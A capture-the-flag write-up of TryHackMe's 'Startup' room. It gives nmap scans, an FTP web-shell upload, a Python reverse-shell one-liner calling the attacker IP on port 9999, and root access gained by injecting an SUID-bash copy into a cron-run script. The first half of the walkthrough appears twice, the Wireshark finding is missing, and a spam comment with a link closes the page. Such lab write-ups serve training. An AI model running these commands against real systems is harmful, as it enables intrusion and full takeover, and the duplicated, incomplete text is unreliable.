Startup-TryHackme
This is a write-up for Try Hack Me's room named Startup.
This can be found here:- https://tryhackme.com/room/startup
Initial Access
===========
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.195.72
# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.195.72
FTP anonymous
Write access in ftp folder
Uploaded php web shell from
- https://github.com/artyuum/Simple-PHP-Web-Shell
Execute this to get reverse shell
- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.98.192",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Upgrade Shell
- python -c "import pty;pty.spawn('/bin/bash')"
What is the secret spicy soup recipe?
============================
$ cat /recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was ****.
User.txt
=======
Navigate through the file system
Found /incidents/suspicious.pcapng
Ran a python webserver to get the packet capture on to the attacking machine:
- python -m SimpleHTTPServer 8080
Ran this command to get the file:
- wget http://10.10.195.72:8080/suspicious.pcapng
Analyze the file with WireShark and you will see:
===========
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.195.72
# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.195.72
FTP anonymous
Write access in ftp folder
Uploaded php web shell from
- https://github.com/artyuum/Simple-PHP-Web-Shell
Execute this to get reverse shell
- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.98.192",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Upgrade Shell
- python -c "import pty;pty.spawn('/bin/bash')"
What is the secret spicy soup recipe?
============================
$ cat /recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was ****.
User.txt
=======
Navigate through the file system
Found /incidents/suspicious.pcapng
Ran a python webserver to get the packet capture on to the attacking machine:
- python -m SimpleHTTPServer 8080
Ran this command to get the file:
- wget http://10.10.195.72:8080/suspicious.pcapng
Analyze the file with WireShark and you will see:
Let's try the password found above for user lennie, do su lennie and then password.
Success and we get the user.txt at /home/lennie
Root.txt
=======
In user lennie home directory check the folder named scripts
lennie@startup:~/scripts$ ls -lrt
ls -lrt
total 8
-rwxr-xr-x 1 root root 77 Nov 12 04:53 planner.sh
-rw-r--r-- 1 root root 1 Nov 19 18:54 startup_list.txt
The planner.sh looks like script run via cronjob
lennie@startup:~/scripts$ cat planner.sh
cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
as we can see /home/lennie/scripts/startup_list.txt file being update every minute.
Also /etc/print.sh is owned by user lennie
Add the following to /etc/print.sh
lennie@startup:~/scripts$ echo "cp /bin/bash /tmp; chmod +s /tmp/bash" >> /etc/print.sh
and after 1 minute we will get this in /tmp
-rwsr-sr-x 1 root root 1037528 Nov 19 19:03 bash
Now run this bash to get root and root flag at /root/root.txt
/tmp/bash -p
This room was easy, but exposes us to wire shark analysis and a technique to do privilege escalation.
NcongceVus_he Manuel Irby https://www.kristinafrancis-thespiritualyou.com/profile/aleighnefilippa/profile
ReplyDeletetelelege